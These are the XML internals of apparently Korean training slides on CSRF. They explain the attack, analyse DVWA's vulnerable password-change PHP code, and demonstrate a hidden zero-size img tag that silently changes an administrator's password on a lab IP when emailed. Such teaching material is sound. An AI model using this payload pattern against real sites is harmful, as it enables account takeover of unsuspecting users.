            <a:pPr algn="l"/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 CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192207" y="3309457"/>
            <a:ext cx="2193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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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4917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CSRF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개요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579120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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CSRF (Cross Site Request Forgery) :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사이트간 요청 위조</a:t>
            </a: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5BA038D4-0ADA-4752-A492-952FB74E6091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="2263144"/>
            <a:ext cx="6614220" cy="11277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1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자신의 의지와 무관하게 공격자가 의도한 행동을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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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웹페이지를 보안에 취약하게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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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거나 수정, 삭제 등의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작업을</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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하게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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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공격방법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0AB58A31-0796-404A-A343-03891D245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" y="4738296"/>
            <a:ext cx="65" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7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9D100792-6254-4BF4-8527-AF0801174C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="3451859"/>
            <a:ext cx="6614220" cy="41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※ XSS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사용자가 특정 사이트를 신뢰한다는 점을 공격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AA1BA7C3-10A7-4B49-8F84-1E1F3D539A6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="3779511"/>
            <a:ext cx="6614220" cy="41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※ CSRF :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사이트가 사요자의 브라우저를 신뢰한다는 점을 공격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7BCC9231-F8FD-4B64-8F6E-9F5752B1453C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396180" y="4989895"/>
            <a:ext cx="6131616" cy="579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단계</a:t>
            </a:r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0DD9AC1F-DBE0-4571-A854-2D04AA8F930E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="5492815"/>
            <a:ext cx="6614220" cy="41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웹서버에 정삭적으로 접속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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3002B91-DCA7-4BEA-B7D3-CF703C7F06C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="6099944"/>
            <a:ext cx="6614220" cy="41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 등을 통해 보안사고가 발생했으니 보안강화를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B079006C-DFFC-4CAC-AD80-7A513C7CD782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="7089546"/>
            <a:ext cx="6614220" cy="4191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해킹코드가 동작하여 사용자의 암호를 변경하겠다는 쿼리 발송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3F3632F6-BDE6-48AF-BA62-03178FD85833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="8041048"/>
            <a:ext cx="6614220" cy="41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패스워드 변경 승인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1A9BB72C-FD03-43E7-B12D-A6CF2E4759FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="8649650"/>
            <a:ext cx="6614220" cy="41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단계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해커가 승인된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변경된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패스워드로 서버에 로그인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58F9502B-4E2C-4D38-8D30-01EAFB83E4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="6445652"/>
            <a:ext cx="6614220" cy="41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위해 클릭하세요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사용자가 메일이나 문자등을 클릭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DFE448CA-DDFD-47E6-A07A-D9903C8DC3F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="4192878"/>
            <a:ext cx="6614220" cy="429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100" b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800" b="1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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1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800" b="1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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1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요청이나 응답을 강제하는 공격</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" b="1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36D2F77D-98CA-47D4-9448-EB478A4848C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="7393847"/>
            <a:ext cx="6614220" cy="41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직접 서버에 패스워드 변경 요청을 하는 셈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33018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D9F6B06-1B6D-4E07-9CCC-826F83E2787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F58848A-FDFF-4CC6-971C-E1BAC43AD37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="330229" y="2752036"/>
            <a:ext cx="6198863" cy="5800034"/>
            <a:chOff x="330229" y="2752036"/>
            <a:chExt cx="6198863" cy="5800034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963D8B57-A270-49BC-A187-8E4EAC3B02DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3417540" y="3599070"/>
              <a:ext cx="0" cy="495300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22E73ECA-1D91-41BC-91F5-98FAE9D82639}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5969489" y="3599070"/>
              <a:ext cx="0" cy="495300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F431FE60-ED66-4FA1-ABD8-B099AFF2493E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="752691" y="3814970"/>
              <a:ext cx="0" cy="4737100"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="889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4" name="Picture 6" descr="노트북 무료 아이콘 의 Mobirise">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53761559-5830-459A-A4BB-E6D97F112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745" y="2863293"/>
              <a:ext cx="1064510" cy="1064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서버 무료 아이콘 의 Windows 8 Icon">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8470D8FF-6A65-4F29-A276-97D80F8048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58" y="3007335"/>
              <a:ext cx="802468" cy="80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서버 무료 아이콘 의 Windows 8 Icon">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139EF063-F6EB-4731-85CA-864F47A23E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2355" y="3007334"/>
              <a:ext cx="802470" cy="80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5AA4162-517D-4F00-B9B6-3BFA94313F8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4089560" y="3459370"/>
              <a:ext cx="1229262" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="136525">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:headEnd w="sm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텍스트 개체 틀 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97EDEDD5-9407-4167-97AD-8AD974CAEEF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3875530" y="3078353"/>
              <a:ext cx="1868045" cy="419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1) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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희생자 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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타겟 서버 접속</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" b="1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F8BF8BF0-7B9B-49C1-8B60-B367529F8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2759" y="4154125"/>
              <a:ext cx="2331942" cy="1134701"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="136525">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd w="sm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텍스트 개체 틀 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEAA088B-31D5-4309-AF55-122057EA2E83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="951315" y="4360908"/>
              <a:ext cx="1572807" cy="419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2) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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해커의 웹서버 방문</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" b="1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C8C86329-7BCD-43CF-90F7-68BDB5AD98AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947752" y="5465314"/>
              <a:ext cx="2356888" cy="1101855"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="136525">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd w="sm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텍스트 개체 틀 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FC45F0-82B1-428F-81A8-F35BDAB99BC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1056090" y="6109967"/>
              <a:ext cx="1936115" cy="419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0" indent="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3) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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웹 페이지가 </a:t>
              </a:r>
              <a:endPara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CSRF code </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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포함하고있음</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" b="1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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47" name="직선 화살표 연결선 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7ABA8EB-4218-41DA-9BC5-216D5F22E32B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3530441" y="6652499"/>
              <a:ext cx="2355735" cy="1105821"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="136525">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:headEnd w="sm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텍스트 개체 틀 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129791BB-C99E-40CD-B332-476D3ABE0742}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3783888" y="6558329"/>
              <a:ext cx="1808465" cy="419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0" indent="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4) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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브라우저가 웹 서버에게</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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ko-KR" altLang="en-US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        요청 보냄</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" b="1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49" name="텍스트 개체 틀 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68FF381-3858-4A16-8C0A-63CF2A09C224}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="330229" y="2754520"/>
              <a:ext cx="1063189" cy="419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/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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공격자 서버</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" b="1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50" name="텍스트 개체 틀 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D72FB8B-9862-455C-BBBF-0CB594BA87CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5464582" y="2752036"/>
              <a:ext cx="1064510" cy="4191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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" b="1"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타겟 서버</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" b="1"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6" name="제목 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B64F46-F5B6-431A-8A48-BD51A160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CSRF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개요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2E287DFB-479C-4B83-9D77-351AD48008A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09162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4909C30-72E6-446A-B310-4F6FB4A3D492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소스코드 분석</a:t>
            </a:r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ko-KR" altLang="en-US" sz="20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3C463-FD29-416F-A683-E1D592ECFCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2278306"/>
            <a:ext cx="5736954" cy="686569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endParaRPr lang="en-US" altLang="ko-KR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 isset( $_GET[ 'Change' ] ) ) {   // Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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누르면</a:t>
            </a:r>
          </a:p>
          <a:p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/*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입력값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PW, PW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*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR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$pass_new  = $_GET[ 'password_new' ]; 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P/W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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern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$pass_conf = $_GET[ 'password_conf' ]; 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P/W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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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Do the passwords match?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if( $pass_new == $pass_conf ) {       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입력한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P/W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재입력한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P/W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일치하면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$pass_new = ((isset($GLOBALS["___mysqli_ston"]) &amp;&amp; is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="008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조건식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반환값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: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반환값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 =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조건식이 참이면 반환값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1,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거짓이면 반환값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</a:p>
          <a:p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//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사용하고있는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설정되있고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객체라면 특수문자를 회피한 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pass_new</a:t>
            </a:r>
          </a:p>
          <a:p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반환 아닐시 에러</a:t>
            </a:r>
          </a:p>
          <a:p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// isset() :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전달 받은 변수가 선언되어 있는지 검사</a:t>
            </a:r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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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is_object() : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="12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전달받은 변수의 타입이 객체인지를 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern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1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="008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$pass_new = md5( $pass_new );  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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패스워드 암호화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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62106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46481D7-850E-4B3C-8FBC-13C77B895C7C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소스코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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계속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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en-US" altLang="ko-KR" sz="18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ko-KR" altLang="en-US" sz="20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1C3C463-FD29-416F-A683-E1D592ECFCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2278306"/>
            <a:ext cx="5736954" cy="686569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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="008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/* DB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업데이트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*/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$insert = "UPDATE 'users' SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";  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DB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 P/W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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" b="1" kern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$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '&lt;pre&gt;' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR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//mysqli_query(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연결 객체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쿼리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함수는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mysqli_connect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endParaRPr lang="en-US" altLang="ko-KR" sz="1300" b="1" kern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통해 연결된 객체를 이용하여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MySQL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쿼리를 실행</a:t>
            </a:r>
          </a:p>
          <a:p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//mysqli_error()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최근에 실행된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MySQL API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함수의 에러 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" b="1" kern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메시지 문자열 리턴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//mysqli_connect_error()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함수는 마지막 연결 오류 오류 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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설명을 반환</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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ko-KR" altLang="en-US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/* Feedback for the user */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echo "&lt;pre&gt;Password Changed.&lt;/pre&gt;";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}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else {     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입력한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P/W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재입력한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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P/W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF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일치하지 않으면</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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  <a:endParaRPr lang="en-US" altLang="ko-KR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echo "&lt;pre&gt;Passwords did not match.&lt;/pre&gt;";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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR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((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);</a:t>
            </a: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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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4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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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36482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</a:t>
            </a:r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HTTP request - get )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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40606F7-89BE-421B-A200-7C7F395BF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6" y="2959943"/>
            <a:ext cx="4838700" cy="103947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314822C-064B-4A69-82D0-6CDE91560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4428675"/>
            <a:ext cx="4695825" cy="2984914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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0E59DD6F-7377-42BE-8A37-67ED9EC6CCD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1645192" y="7309442"/>
            <a:ext cx="5568404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get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받으면 주소에 패스워드가 노출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A7DF4F7D-C223-484B-B1E9-3A9F55E195D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="2510794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2-1.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패스워드 변경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4098617A-3F73-495B-A243-841F84EA5887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="7868924"/>
            <a:ext cx="5568404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다른 사이트에 대해서 이 공격이 성공하기 위해서는 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0A1EB6D9-5BE4-48C7-B19B-72C48650CBE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="8142969"/>
            <a:ext cx="5568404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관리자의 세션 쿠키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(PHPSESSID)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알아야 한다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8DA3C083-CF4A-4DB2-BF4E-E0DA2843D30A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="8568429"/>
            <a:ext cx="5568404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관리자 권한의 세션키로 이미 접속하고 있는 관리자에게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10E8463B-9436-40A2-AD70-4D6613A9AA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="8852128"/>
            <a:ext cx="5568404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    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대신 비밀번호 변경 요청을 하도록 유도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02628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3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</a:t>
            </a:r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HTTP request - get )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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A7DF4F7D-C223-484B-B1E9-3A9F55E195D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="2510794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2-2.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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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1E6BE196-DA78-4980-AEF4-B4D4CA55398B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2944697"/>
            <a:ext cx="5736954" cy="75100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&lt;img src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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http://192.168.206.136/vulnerabilities/csrf/?password_new=1234&amp;password_conf=1234&amp;Change=Change</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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3A37EEAF-770A-4922-921E-05999FDC7402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="3676570"/>
            <a:ext cx="6614220" cy="41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위의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HTML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포함하여 관리자에게 메일 보냄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3C44390-4695-4C10-A4A9-94825385E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63" y="4238549"/>
            <a:ext cx="5736954" cy="24201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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81719488-FC7D-457B-B7C1-1D401C58DECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="7351871"/>
            <a:ext cx="6614220" cy="4191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※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이미지를 완전히 숨기고 싶으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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width=0와 height=0 속성을 이용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DC140B82-D21B-49B4-9630-A3538E28298F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="7763400"/>
            <a:ext cx="5736954" cy="75100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&lt;img src=http://192.168.206.136/vulnerabilities/csrf/?password_new=1234&amp;password_conf=1234&amp;Change=Change</a:t>
